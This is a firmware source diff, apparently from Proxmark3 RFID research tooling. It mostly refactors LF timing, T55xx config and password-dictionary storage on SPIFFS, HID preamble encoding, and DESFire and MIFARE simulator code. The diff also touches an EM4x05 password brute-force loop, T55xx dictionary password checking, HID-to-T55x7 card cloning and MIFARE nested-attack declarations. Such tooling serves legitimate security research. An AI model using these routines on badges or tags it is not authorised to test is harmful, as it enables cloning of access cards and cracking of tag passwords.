 void SendRawCommand15693(iso15_raw_cmd_t *packet); // send arbitrary commands from CLI
@@ -69,4 +68,5 @@ void EnableEAS_AFISlixIso15693(const uint8_t *password, bool usepwd);
 void PassProtextEASSlixIso15693(const uint8_t *password);
 void PassProtectAFISlixIso15693(const uint8_t *password);
 void WriteAFIIso15693(const uint8_t *password, bool use_pwd, uint8_t *uid, bool use_uid, uint8_t afi);
+void ProtectPageSlixIso15693(const uint8_t *read_password, const uint8_t *write_password, uint8_t divide_ptr, uint8_t prot_status);
 #endif

armsrc/lfadc.c

@@ -236,8 +236,13 @@ void lf_init(bool reader, bool simulate, bool ledcontrol) {
     FpgaSetupSsc(FPGA_MAJOR_MODE_LF_READER);
 
     // When in reader mode, give the field a bit of time to settle.
-    // 313T0 = 313 * 8us = 2504us = 2.5ms  Hitag2 tags needs to be fully powered.
-    SpinDelay(10);
+    // Optimal timing window for LF ADC measurements to be performed:
+    // minimum: 313T0 = 313 * 8us = 2504us = 2.50ms - Hitag2 tag internal powerup time
+    //          280T0 = 280 * 8us = 2240us = 2.24ms - HitagS minimum time before the first command (powerup time)
+    // maximum: 545T0 = 545 * 8us = 4360us = 4.36ms - Hitag2 command waiting time before it starts transmitting in public mode (if configured so)
+    //          565T0 = 565 * 8us = 4520us = 4.52ms - HitagS waiting time before entering TTF mode (if configured so)
+    // Thus (2.50 ms + 4.36 ms) / 2 ~= 3 ms (rounded down to integer), should be a good timing for both tag models
+    SpinDelay(3);
 
     // Steal this pin from the SSP (SPI communication channel with fpga) and use it to control the modulation
     AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT;

armsrc/lfops.c

@@ -29,7 +29,6 @@
 #include "dbprint.h"
 #include "util.h"
 #include "commonutil.h"
-
 #include "crc16.h"
 #include "string.h"
 #include "printf.h"
@@ -38,7 +37,8 @@
 #include "protocols.h"
 #include "pmflash.h"
 #include "flashmem.h" // persistence on flash
-#include "appmain.h" // print stack
+#include "spiffs.h"   // spiffs
+#include "appmain.h"  // print stack
 
 /*
 Notes about EM4xxx timings.
@@ -64,11 +64,11 @@ SAM7S has several timers, we will use the source TIMER_CLOCK1 (aka AT91C_TC_CLKS
  TIMER_CLOCK1 = MCK/2, MCK is running at 48 MHz, Timer is running at 48/2 = 24 MHz
 
 New timer implementation in ticks.c, which is used in LFOPS.c
-       1 μs = 1.5 ticks
- 1 fc = 8 μs = 12 ticks
+       1 µs = 1.5 ticks
+ 1 fc = 8 µs = 12 ticks
 
 Terms you find in different datasheets and how they match.
-1 Cycle = 8 microseconds (μs)  == 1 field clock (fc)
+1 Cycle = 8 microseconds (µs)  == 1 field clock (fc)
 
 Note about HITAG timing
 Hitag units (T0) have duration of 8 microseconds (us), which is 1/125000 per second (carrier)
@@ -80,7 +80,7 @@ Hitag units (T0) have duration of 8 microseconds (us), which is 1/125000 per sec
   ==========================================================================================================
 
     ATA5577 Downlink Protocol Timings.
-    Note: All absolute times assume TC = 1 / fC = 8 μs (fC = 125 kHz)
+    Note: All absolute times assume TC = 1 / fC = 8 µs (fC = 125 kHz)
 
     Note: These timings are from the datasheet and doesn't map the best to the features of the RVD4 LF antenna.
           RDV4 LF antenna has high voltage and the drop of power when turning off the rf field takes about 1-2 TC longer.
@@ -325,31 +325,7 @@ void setT55xxConfig(uint8_t arg0, const t55xx_configurations_t *c) {
         return;
     }
 
-    if (!FlashInit()) {
-        BigBuf_free();
-        return;
-    }
-
-    uint8_t *buf = BigBuf_malloc(T55XX_CONFIG_LEN);
-    Flash_CheckBusy(BUSY_TIMEOUT);
-    uint16_t res = Flash_ReadDataCont(T55XX_CONFIG_OFFSET, buf, T55XX_CONFIG_LEN);
-    if (res == 0) {
-        FlashStop();
-        BigBuf_free();
-        return;
-    }
-
-    memcpy(buf, &T55xx_Timing, T55XX_CONFIG_LEN);
-
-    // delete old configuration
-    Flash_CheckBusy(BUSY_TIMEOUT);
-    Flash_WriteEnable();
-    Flash_Erase4k(3, 0xD);
-
-    // write new
-    res = Flash_Write(T55XX_CONFIG_OFFSET, buf, T55XX_CONFIG_LEN);
-
-    if (res == T55XX_CONFIG_LEN && g_dbglevel > 1) {
+    if (SPIFFS_OK == rdv40_spiffs_write(T55XX_CONFIG_FILE, (uint8_t *)&T55xx_Timing, T55XX_CONFIG_LEN, RDV40_SPIFFS_SAFETY_SAFE)) {
         DbpString("T55XX Config save " _GREEN_("success"));
     }
 
@@ -364,15 +340,23 @@ t55xx_configurations_t *getT55xxConfig(void) {
 void loadT55xxConfig(void) {
 #ifdef WITH_FLASH
 
-    if (!FlashInit()) {
+    uint8_t *buf = BigBuf_calloc(T55XX_CONFIG_LEN);
+
+    uint32_t size = 0;
+    if (exists_in_spiffs(T55XX_CONFIG_FILE)) {
+        size = size_in_spiffs(T55XX_CONFIG_FILE);
+    }
+    if (size == 0) {
+        Dbprintf("Spiffs file: %s does not exists or empty.", T55XX_CONFIG_FILE);
+        BigBuf_free();
         return;
     }
 
-    uint8_t *buf = BigBuf_malloc(T55XX_CONFIG_LEN);
-
-    Flash_CheckBusy(BUSY_TIMEOUT);
-    uint16_t isok = Flash_ReadDataCont(T55XX_CONFIG_OFFSET, buf, T55XX_CONFIG_LEN);
-    FlashStop();
+    if (SPIFFS_OK != rdv40_spiffs_read(T55XX_CONFIG_FILE, buf, T55XX_CONFIG_LEN, RDV40_SPIFFS_SAFETY_SAFE)) {
+        Dbprintf("Spiffs file: %s cannot be read.", T55XX_CONFIG_FILE);
+        BigBuf_free();
+        return;
+    }
 
     // verify read mem is actual data.
     uint8_t cntA = T55XX_CONFIG_LEN, cntB = T55XX_CONFIG_LEN;
@@ -381,6 +365,7 @@ void loadT55xxConfig(void) {
         if (buf[i] == 0x00) cntB--;
     }
     if (!cntA || !cntB) {
+        Dbprintf("Spiffs file: %s does not malformed or empty.", T55XX_CONFIG_FILE);
         BigBuf_free();
         return;
     }
@@ -388,7 +373,7 @@ void loadT55xxConfig(void) {
     if (buf[0] != 0xFF) // if not set for clear
         memcpy((uint8_t *)&T55xx_Timing, buf, T55XX_CONFIG_LEN);
 
-    if (isok == T55XX_CONFIG_LEN) {
+    if (size == T55XX_CONFIG_LEN) {
         if (g_dbglevel > 1) DbpString("T55XX Config load success");
     }
 
@@ -959,6 +944,33 @@ static void fcAll(uint8_t fc, int *n, uint8_t clock, int16_t *remainder) {
     }
 }
 
+bool add_HID_preamble(uint32_t *hi2, uint32_t *hi, uint32_t *lo, uint8_t length) {
+    // Invalid value
+    if (length > 84 || length == 0)
+        return false;
+
+    if (length == 48) {
+        *hi |= 1U << (length - 32); // Example leading 1: start bit
+        return true;
+    }
+    if (length >= 64) {
+        *hi2 |= 0x09e00000; // Extended-length header
+        *hi2 |= 1U << (length - 64); // leading 1: start bit
+    } else if (length > 37) {
+        *hi2 |= 0x09e00000; // Extended-length header
+        *hi |= 1U << (length - 32); // leading 1: start bit
+    } else if (length == 37) {
+        // No header bits added to 37-bit cards
+    } else if (length >= 32) {
+        *hi |= 0x20; // Bit 37; standard header
+        *hi |= 1U << (length - 32); // leading 1: start bit
+    } else {
+        *hi |= 0x20; // Bit 37; standard header
+        *lo |= 1U << length; // leading 1: start bit
+    }
+    return true;
+}
+
 // prepare a waveform pattern in the buffer based on the ID given then
 // simulate a HID tag until the button is pressed
 void CmdHIDsimTAGEx(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT, bool ledcontrol, int numcycles) {
@@ -983,13 +995,7 @@ void CmdHIDsimTAGEx(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT, boo
     uint16_t n = 8;
 
     if (longFMT) {
-        // Ensure no more than 84 bits supplied
-        if (hi2 > 0xFFFFF) {
-            DbpString("Tags can only have 84 bits.");
-            return;
-        }
         bitlen = 8 + 8 * 2 + 84 * 2;
-        hi2 |= 0x9E00000; // 9E: long format identifier
         manchesterEncodeUint32(hi2, 16 + 12, bits, &n);
         manchesterEncodeUint32(hi, 32, bits, &n);
         manchesterEncodeUint32(lo, 32, bits, &n);
@@ -1021,7 +1027,6 @@ void CmdFSKsimTAGEx(uint8_t fchigh, uint8_t fclow, uint8_t separator, uint8_t cl
     // free eventually allocated BigBuf memory
     BigBuf_free();
     BigBuf_Clear_ext(false);
-    clear_trace();
     set_tracing(false);
 
     int n = 0, i = 0;
@@ -2147,29 +2152,34 @@ void T55xx_ChkPwds(uint8_t flags, bool ledcontrol) {
 #ifdef WITH_FLASH
 
     BigBuf_Clear_EM();
-    uint16_t isok = 0;
-    uint8_t counter[2] = {0x00, 0x00};
-    isok = Flash_ReadData(DEFAULT_T55XX_KEYS_OFFSET, counter, sizeof(counter));
-    if (isok != sizeof(counter))
-        goto OUT;
+    uint32_t size = 0;
 
-    pwd_count = (uint16_t)(counter[1] << 8 | counter[0]);
+    if (exists_in_spiffs(T55XX_KEYS_FILE)) {
+        size = size_in_spiffs(T55XX_KEYS_FILE);
+    }
+    if (size == 0) {
+        Dbprintf("Spiffs file: %s does not exists or empty.", T55XX_KEYS_FILE);
+        goto OUT;
+    }
+
+    pwd_count = size / T55XX_KEY_LENGTH;
     if (pwd_count == 0)
         goto OUT;
 
     // since flash can report way too many pwds, we need to limit it.
     // bigbuff EM size is determined by CARD_MEMORY_SIZE
     // a password is 4bytes.
-    uint16_t pwd_size_available = MIN(CARD_MEMORY_SIZE, pwd_count * 4);
+    uint16_t pwd_size_available = MIN(CARD_MEMORY_SIZE, pwd_count * T55XX_KEY_LENGTH);
 
     // adjust available pwd_count
-    pwd_count = pwd_size_available / 4;
+    pwd_count = pwd_size_available / T55XX_KEY_LENGTH;
 
-    isok = Flash_ReadData(DEFAULT_T55XX_KEYS_OFFSET + 2, pwds, pwd_size_available);
-    if (isok != pwd_size_available)
+    if (SPIFFS_OK == rdv40_spiffs_read_as_filetype(T55XX_KEYS_FILE, pwds, pwd_size_available, RDV40_SPIFFS_SAFETY_SAFE)) {
+        if (g_dbglevel >= DBG_ERROR) Dbprintf("Loaded %u passwords from spiffs file: %s", pwd_count, T55XX_KEYS_FILE);
+    } else {
+        Dbprintf("Spiffs file: %s cannot be read.", T55XX_KEYS_FILE);
         goto OUT;
-
-    Dbprintf("Password dictionary count " _YELLOW_("%d"), pwd_count);
+    }
 
 #endif
 
@@ -2285,15 +2295,10 @@ void CopyHIDtoT55x7(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT, boo
     uint8_t last_block = 0;
 
     if (longFMT) {
-        // Ensure no more than 84 bits supplied
-        if (hi2 > 0xFFFFF) {
-            DbpString("Tags can only have 84 bits");
-            return;
-        }
         // Build the 6 data blocks for supplied 84bit ID
         last_block = 6;
-        // load preamble (1D) & long format identifier (9E manchester encoded)
-        data[1] = 0x1D96A900 | (manchesterEncode2Bytes((hi2 >> 16) & 0xF) & 0xFF);
+        // load preamble (1D)
+        data[1] = 0x1D000000 | (manchesterEncode2Bytes((hi2 >> 16) & 0xFFFF) & 0xFFFFFF);
         // load raw id from hi2, hi, lo to data blocks (manchester encoded)
         data[2] = manchesterEncode2Bytes(hi2 & 0xFFFF);
         data[3] = manchesterEncode2Bytes(hi >> 16);
@@ -2593,13 +2598,13 @@ static void SendForward(uint8_t fwd_bit_count, bool fast) {
 // 32FC * 8us == 256us / 21.3 ==  12.018 steps. ok
 // 16FC * 8us == 128us / 21.3 ==  6.009 steps. ok
 #ifndef EM_START_GAP
-#define EM_START_GAP 55*8
+#define EM_START_GAP (55 * 8)
 #endif
 
     fwd_write_ptr = forwardLink_data;
     fwd_bit_sz = fwd_bit_count;
 
-    if (! fast) {
+    if (fast == false) {
         // Set up FPGA, 125kHz or 95 divisor
         LFSetupFPGAForADC(LF_DIVISOR_125, true);
     }
@@ -2639,16 +2644,21 @@ void EM4xBruteforce(uint32_t start_pwd, uint32_t n, bool ledcontrol) {
     FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
     WaitMS(20);
     if (ledcontrol) LED_A_ON();
+
     LFSetupFPGAForADC(LF_DIVISOR_125, true);
+
     uint32_t candidates_found = 0;
     for (uint32_t pwd = start_pwd; pwd < 0xFFFFFFFF; pwd++) {
+
         if (((pwd - start_pwd) & 0x3F) == 0x00) {
+
             WDT_HIT();
             if (BUTTON_PRESS() || data_available()) {
                 Dbprintf("EM4x05 Bruteforce Interrupted");
                 break;
             }
         }
+
         // Report progress every 256 attempts
         if (((pwd - start_pwd) & 0xFF) == 0x00) {
             Dbprintf("Trying: %06Xxx", pwd >> 8);
@@ -2662,7 +2672,9 @@ void EM4xBruteforce(uint32_t start_pwd, uint32_t n, bool ledcontrol) {
 
         WaitUS(400);
         DoPartialAcquisition(0, false, 350, 1000, ledcontrol);
+
         uint8_t *mem = BigBuf_get_addr();
+
         if (mem[334] < 128) {
             candidates_found++;
             Dbprintf("Password candidate: " _GREEN_("%08X"), pwd);
@@ -2671,6 +2683,7 @@ void EM4xBruteforce(uint32_t start_pwd, uint32_t n, bool ledcontrol) {
                 break;
             }
         }
+
         // Beware: if smaller, tag might not have time to be back in listening state yet
         WaitMS(1);
     }
@@ -2719,7 +2732,9 @@ void EM4xReadWord(uint8_t addr, uint32_t pwd, uint8_t usepwd, bool ledcontrol) {
     * 0000 1010 ok
     * 0000 0001 fail
     **/
-    if (usepwd) EM4xLoginEx(pwd);
+    if (usepwd) {
+        EM4xLoginEx(pwd);
+    }
 
     forward_ptr = forwardLink_data;
     uint8_t len = Prepare_Cmd(FWD_CMD_READ);
@@ -2754,7 +2769,9 @@ void EM4xWriteWord(uint8_t addr, uint32_t data, uint32_t pwd, uint8_t usepwd, bo
     * 0000 1010 ok.
     * 0000 0001 fail
     **/
-    if (usepwd) EM4xLoginEx(pwd);
+    if (usepwd) {
+        EM4xLoginEx(pwd);
+    }
 
     forward_ptr = forwardLink_data;
     uint8_t len = Prepare_Cmd(FWD_CMD_WRITE);
@@ -2797,7 +2814,9 @@ void EM4xProtectWord(uint32_t data, uint32_t pwd, uint8_t usepwd, bool ledcontro
     * 0000 1010 ok.
     * 0000 0001 fail
     **/
-    if (usepwd) EM4xLoginEx(pwd);
+    if (usepwd) {
+        EM4xLoginEx(pwd);
+    }
 
     forward_ptr = forwardLink_data;
     uint8_t len = Prepare_Cmd(FWD_CMD_PROTECT);
@@ -2893,7 +2912,7 @@ void Cotag(uint32_t arg0, bool ledcontrol) {
             break;
         }
         case 1: {
-            uint8_t *dest = BigBuf_malloc(COTAG_BITS);
+            uint8_t *dest = BigBuf_calloc(COTAG_BITS);
             uint16_t bits = doCotagAcquisitionManchester(dest, COTAG_BITS);
             reply_ng(CMD_LF_COTAG_READ, PM3_SUCCESS, dest, bits);
             break;

armsrc/lfops.h

@@ -34,6 +34,7 @@ void SimulateTagLowFrequencyEx(int period, int gap, bool ledcontrol, int numcycl
 void SimulateTagLowFrequency(int period, int gap, bool ledcontrol);
 void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen);
 
+bool add_HID_preamble(uint32_t *hi2, uint32_t *hi, uint32_t *lo, uint8_t length);
 void CmdHIDsimTAGEx(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT, bool ledcontrol, int numcycles);
 void CmdHIDsimTAG(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT, bool ledcontrol);
 

armsrc/lfsampling.c

@@ -149,7 +149,7 @@ void initSampleBufferEx(uint32_t *sample_size, bool use_malloc) {
             data.buffer = BigBuf_get_addr();
         } else {
             *sample_size = MIN(*sample_size, BigBuf_max_traceLen());
-            data.buffer = BigBuf_malloc(*sample_size);
+            data.buffer = BigBuf_calloc(*sample_size);
         }
 
     } else {
@@ -669,7 +669,7 @@ void doT55x7Acquisition(size_t sample_size, bool ledcontrol) {
 void doCotagAcquisition(void) {
 
     uint16_t bufsize = BigBuf_max_traceLen();
-    uint8_t *dest = BigBuf_malloc(bufsize);
+    uint8_t *dest = BigBuf_calloc(bufsize);
 
     dest[0] = 0;
 
@@ -739,8 +739,9 @@ void doCotagAcquisition(void) {
 
 uint16_t doCotagAcquisitionManchester(uint8_t *dest, uint16_t destlen) {
 
-    if (dest == NULL)
+    if (dest == NULL) {
         return 0;
+    }
 
     dest[0] = 0;
 

armsrc/mifarecmd.h

@@ -37,16 +37,14 @@ void MifareNested(uint8_t blockNo, uint8_t keyType, uint8_t targetBlockNo, uint8
 void MifareStaticNested(uint8_t blockNo, uint8_t keyType, uint8_t targetBlockNo, uint8_t targetKeyType, uint8_t *key);
 
 void MifareAcquireEncryptedNonces(uint32_t arg0, uint32_t arg1, uint32_t flags, uint8_t *datain);
-void MifareAcquireStaticEncryptedNonces(uint32_t flags, uint8_t *key);
+int MifareAcquireStaticEncryptedNonces(uint32_t flags, const uint8_t *key, bool reply, uint8_t first_block_no, uint8_t first_key_type);
 void MifareAcquireNonces(uint32_t arg0, uint32_t flags);
 void MifareChkKeys(uint8_t *datain, uint8_t reserved_mem);
 void MifareChkKeys_fast(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain);
 void MifareChkKeys_file(uint8_t *fn);
 
-void MifareEMemClr(void);
-void MifareEMemGet(uint8_t blockno, uint8_t blockcnt);
-int MifareECardLoad(uint8_t sectorcnt, uint8_t keytype);
-int MifareECardLoadExt(uint8_t sectorcnt, uint8_t keytype);
+int MifareECardLoad(uint8_t sectorcnt, uint8_t keytype, uint8_t *key);
+int MifareECardLoadExt(uint8_t sectorcnt, uint8_t keytype, uint8_t *key);
 
 // MFC GEN1a /1b
 void MifareCSetBlock(uint32_t arg0, uint32_t arg1, uint8_t *datain);  // Work with "magic Chinese" card

armsrc/mifaredesfire.c

@@ -60,7 +60,7 @@ bool InitDesfireCard(void) {
     iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN);
     set_tracing(true);
 
-    if (!iso14443a_select_card(NULL, &card, NULL, true, 0, false)) {
+    if (iso14443a_select_card(NULL, &card, NULL, true, 0, false) == 0) {
         if (g_dbglevel >= DBG_ERROR) DbpString("Can't select card");
         OnError(1);
         return false;
@@ -157,7 +157,7 @@ void MifareDesfireGetInformation(void) {
     pcb_blocknum = 0;
 
     // card select - information
-    if (!iso14443a_select_card(NULL, &card, NULL, true, 0, false)) {
+    if (iso14443a_select_card(NULL, &card, NULL, true, 0, false) == 0) {
         if (g_dbglevel >= DBG_ERROR) {
             DbpString("Can't select card");
         }
@@ -343,10 +343,11 @@ void MifareDES_Auth1(uint8_t *datain) {
 
     uint8_t subcommand = MFDES_AUTHENTICATE;
 
-    if (payload->mode == MFDES_AUTH_AES)
+    if (payload->mode == MFDES_AUTH_AES) {
         subcommand = MFDES_AUTHENTICATE_AES;
-    else if (payload->mode == MFDES_AUTH_ISO)
+    } else if (payload->mode == MFDES_AUTH_ISO) {
         subcommand = MFDES_AUTHENTICATE_ISO;
+    }
 
     if (payload->mode != MFDES_AUTH_PICC) {
         // Let's send our auth command
@@ -364,7 +365,7 @@ void MifareDES_Auth1(uint8_t *datain) {
         len = DesfireAPDU(cmd, 2, resp);
     }
 
-    if (!len) {
+    if (len == 0) {
         if (g_dbglevel >= DBG_ERROR) {
             DbpString("Authentication failed. Card timeout.");
         }
@@ -408,6 +409,7 @@ void MifareDES_Auth1(uint8_t *datain) {
 
     // Part 3
     if (payload->algo == MFDES_ALGO_AES) {
+
         if (mbedtls_aes_setkey_dec(&ctx, key->data, 128) != 0) {
             if (g_dbglevel >= DBG_EXTENDED) {
                 DbpString("mbedtls_aes_setkey_dec failed");
@@ -416,12 +418,14 @@ void MifareDES_Auth1(uint8_t *datain) {
             return;
         }
         mbedtls_aes_crypt_cbc(&ctx, MBEDTLS_AES_DECRYPT, 16, IV, encRndB, RndB);
-    } else if (payload->algo == MFDES_ALGO_DES)
+
+    } else if (payload->algo == MFDES_ALGO_DES) {
         des_decrypt(RndB, encRndB, key->data);
-    else if (payload->algo == MFDES_ALGO_3DES)
+    } else if (payload->algo == MFDES_ALGO_3DES) {
         tdes_nxp_receive(encRndB, RndB, rndlen, key->data, IV, 2);
-    else if (payload->algo == MFDES_ALGO_3K3DES)
+    } else if (payload->algo == MFDES_ALGO_3K3DES) {
         tdes_nxp_receive(encRndB, RndB, rndlen, key->data, IV, 3);
+    }
 
     // - Rotate RndB by 8 bits
     memcpy(rotRndB, RndB, rndlen);
@@ -431,6 +435,7 @@ void MifareDES_Auth1(uint8_t *datain) {
 
     // - Encrypt our response
     if (payload->mode == MFDES_AUTH_DES || payload->mode == MFDES_AUTH_PICC) {
+
         des_decrypt(encRndA, RndA, key->data);
         memcpy(both, encRndA, rndlen);
 
@@ -440,7 +445,9 @@ void MifareDES_Auth1(uint8_t *datain) {
 
         des_decrypt(encRndB, rotRndB, key->data);
         memcpy(both + 8, encRndB, rndlen);
+
     } else if (payload->mode == MFDES_AUTH_ISO) {
+
         if (payload->algo == MFDES_ALGO_3DES) {
             uint8_t tmp[16] = {0x00};
             memcpy(tmp, RndA, rndlen);
@@ -452,11 +459,15 @@ void MifareDES_Auth1(uint8_t *datain) {
             memcpy(tmp + rndlen, rotRndB, rndlen);
             tdes_nxp_send(tmp, both, 32, key->data, IV, 3);
         }
+
     } else if (payload->mode == MFDES_AUTH_AES) {
+
         uint8_t tmp[32] = {0x00};
         memcpy(tmp, RndA, rndlen);
         memcpy(tmp + 16, rotRndB, rndlen);
+
         if (payload->algo == MFDES_ALGO_AES) {
+
             if (mbedtls_aes_setkey_enc(&ctx, key->data, 128) != 0) {
                 if (g_dbglevel >= DBG_EXTENDED) {
                     DbpString("mbedtls_aes_setkey_enc failed");
@@ -472,6 +483,7 @@ void MifareDES_Auth1(uint8_t *datain) {
     if (payload->algo == MFDES_ALGO_AES || payload->algo == MFDES_ALGO_3K3DES) {
         bothlen = 32;
     }
+
     if (payload->mode != MFDES_AUTH_PICC) {
         cmd[0] = 0x90;
         cmd[1] = MFDES_ADDITIONAL_FRAME;
@@ -496,25 +508,30 @@ void MifareDES_Auth1(uint8_t *datain) {
     }
 
     if (payload->mode != MFDES_AUTH_PICC) {
+
         if ((resp[len - 4] != 0x91) || (resp[len - 3] != 0x00)) {
             DbpString("Authentication failed.");
             OnErrorNG(CMD_HF_DESFIRE_AUTH1, 6);
             return;
         }
+
     } else {
+
         if (resp[1] != 0x00) {
             DbpString("Authentication failed.");
             OnErrorNG(CMD_HF_DESFIRE_AUTH1, 6);
             return;
         }
+
     }
 
     // Part 4
 
     Desfire_session_key_new(RndA, RndB, key, sessionkey);
 
-    if (g_dbglevel >= DBG_EXTENDED)
+    if (g_dbglevel >= DBG_EXTENDED) {
         print_result("SESSIONKEY : ", sessionkey->data, payload->keylen);
+    }
 
     if (payload->mode != MFDES_AUTH_PICC) {
         memcpy(encRndA, resp + 1, rndlen);
@@ -523,13 +540,17 @@ void MifareDES_Auth1(uint8_t *datain) {
     }
 
     if (payload->mode == MFDES_AUTH_DES || payload->mode == MFDES_AUTH_PICC) {
-        if (payload->algo == MFDES_ALGO_DES)
+
+        if (payload->algo == MFDES_ALGO_DES) {
             des_decrypt(encRndA, encRndA, key->data);
-        else if (payload->algo == MFDES_ALGO_3DES)
+        } else if (payload->algo == MFDES_ALGO_3DES) {
             tdes_nxp_receive(encRndA, encRndA, rndlen, key->data, IV, 2);
-        else if (payload->algo == MFDES_ALGO_3K3DES)
+        } else if (payload->algo == MFDES_ALGO_3K3DES) {
             tdes_nxp_receive(encRndA, encRndA, rndlen, key->data, IV, 3);
+        }
+
     } else if (payload->mode == MFDES_AUTH_AES) {
+
         if (mbedtls_aes_setkey_dec(&ctx, key->data, 128) != 0) {
             if (g_dbglevel >= DBG_EXTENDED) {
                 DbpString("mbedtls_aes_setkey_dec failed");
@@ -546,6 +567,7 @@ void MifareDES_Auth1(uint8_t *datain) {
         print_result("RndB: ", RndB, rndlen);
         print_result("encRndA : ", encRndA, rndlen);
     }
+
     for (int x = 0; x < rndlen; x++) {
         if (RndA[x] != encRndA[x]) {
             DbpString("Authentication failed. Cannot verify Session Key.");
@@ -645,10 +667,6 @@ void MifareDES_Auth1(uint8_t *datain) {
     */
 
 
-    //OnSuccess();
-    //reply_old(CMD_ACK, 1, 0, 0, skey->data, payload->keylen);
-    //reply_mix(CMD_ACK, 1, len, 0, resp, len);
-
     LED_B_ON();
     authres_t rpayload;
     rpayload.sessionkeylen = payload->keylen;
@@ -671,15 +689,17 @@ int DesfireAPDU(uint8_t *cmd, size_t cmd_len, uint8_t *dataout) {
 
     wrappedLen = CreateAPDU(cmd, cmd_len, wCmd);
 
-    if (g_dbglevel >= DBG_EXTENDED)
+    if (g_dbglevel >= DBG_EXTENDED) {
         print_result("WCMD <--: ", wCmd, wrappedLen);
+    }
 
     ReaderTransmit(wCmd, wrappedLen, NULL);
 
     len = ReaderReceive(resp, sizeof(resp), par);
-    if (!len) {
+    if (len == 0) {
         if (g_dbglevel >= DBG_EXTENDED) Dbprintf("fukked");
         return false; //DATA LINK ERROR
+
     }
     // if we received an I- or R(ACK)-Block with a block number equal to the
     // current block number, toggle the current block number

armsrc/mifaresim.c

@@ -45,10 +45,11 @@
 #include "crc16.h"
 #include "dbprint.h"
 #include "ticks.h"
+#include "parity.h"
 
 static bool IsKeyBReadable(uint8_t blockNo) {
-    uint8_t sector_trailer[16];
-    emlGetMem(sector_trailer, SectorTrailer(blockNo), 1);
+    uint8_t sector_trailer[MIFARE_BLOCK_SIZE] = {0};
+    emlGetMem_xt(sector_trailer, SectorTrailer(blockNo), 1, MIFARE_BLOCK_SIZE);
     uint8_t AC = ((sector_trailer[7] >> 5) & 0x04)
                  | ((sector_trailer[8] >> 2) & 0x02)
                  | ((sector_trailer[8] >> 7) & 0x01);
@@ -56,55 +57,64 @@ static bool IsKeyBReadable(uint8_t blockNo) {
 }
 
 static bool IsTrailerAccessAllowed(uint8_t blockNo, uint8_t keytype, uint8_t action) {
-    uint8_t sector_trailer[16];
-    emlGetMem(sector_trailer, blockNo, 1);
+    uint8_t sector_trailer[MIFARE_BLOCK_SIZE] = {0};
+    emlGetMem_xt(sector_trailer, blockNo, 1, MIFARE_BLOCK_SIZE);
+
     uint8_t AC = ((sector_trailer[7] >> 5) & 0x04)
                  | ((sector_trailer[8] >> 2) & 0x02)
                  | ((sector_trailer[8] >> 7) & 0x01);
+
     switch (action) {
         case AC_KEYA_READ: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsTrailerAccessAllowed: AC_KEYA_READ");
+            }
             return false;
         }
         case AC_KEYA_WRITE: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsTrailerAccessAllowed: AC_KEYA_WRITE");
+            }
             return ((keytype == AUTHKEYA && (AC == 0x00 || AC == 0x01))
                     || (keytype == AUTHKEYB && (AC == 0x04 || AC == 0x03)));
         }
         case AC_KEYB_READ: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsTrailerAccessAllowed: AC_KEYB_READ");
+            }
             return (keytype == AUTHKEYA && (AC == 0x00 || AC == 0x02 || AC == 0x01));
         }
         case AC_KEYB_WRITE: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsTrailerAccessAllowed: AC_KEYB_WRITE");
+            }
             return ((keytype == AUTHKEYA && (AC == 0x00 || AC == 0x01))
                     || (keytype == AUTHKEYB && (AC == 0x04 || AC == 0x03)));
         }
         case AC_AC_READ: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsTrailerAccessAllowed: AC_AC_READ");
+            }
             return ((keytype == AUTHKEYA)
                     || (keytype == AUTHKEYB && !(AC == 0x00 || AC == 0x02 || AC == 0x01)));
         }
         case AC_AC_WRITE: {
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsTrailerAccessAllowed: AC_AC_WRITE");
+            }
             return ((keytype == AUTHKEYA && (AC == 0x01))
                     || (keytype == AUTHKEYB && (AC == 0x03 || AC == 0x05)));
         }
-        default:
+        default: {
             return false;
+        }
     }
 }
 
 static bool IsDataAccessAllowed(uint8_t blockNo, uint8_t keytype, uint8_t action) {
 
-    uint8_t sector_trailer[16];
-    emlGetMem(sector_trailer, SectorTrailer(blockNo), 1);
+    uint8_t sector_trailer[MIFARE_BLOCK_SIZE] = {0};
+    emlGetMem_xt(sector_trailer, SectorTrailer(blockNo), 1, MIFARE_BLOCK_SIZE);
 
     uint8_t sector_block;
     if (blockNo <= MIFARE_2K_MAXBLOCK) {
@@ -119,54 +129,62 @@ static bool IsDataAccessAllowed(uint8_t blockNo, uint8_t keytype, uint8_t action
             AC = ((sector_trailer[7] >> 2) & 0x04)
                  | ((sector_trailer[8] << 1) & 0x02)
                  | ((sector_trailer[8] >> 4) & 0x01);
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsDataAccessAllowed: case 0x00 - %02x", AC);
+            }
             break;
         }
         case 0x01: {
             AC = ((sector_trailer[7] >> 3) & 0x04)
                  | ((sector_trailer[8] >> 0) & 0x02)
                  | ((sector_trailer[8] >> 5) & 0x01);
-            if (g_dbglevel >= DBG_EXTENDED)
+            if (g_dbglevel >= DBG_EXTENDED) {
                 Dbprintf("IsDataAccessAllowed: case 0x01 - %02x", AC);
+            }
             break;
         }
         case 0x02: {
             AC = ((sector_trailer[7] >> 4) & 0x04)
                  | ((sector_trailer[8] >> 1) & 0x02)
                  | ((sector_trailer[8] >> 6) & 0x01);
-            if (g_dbglevel >= DBG_EXTENDED)
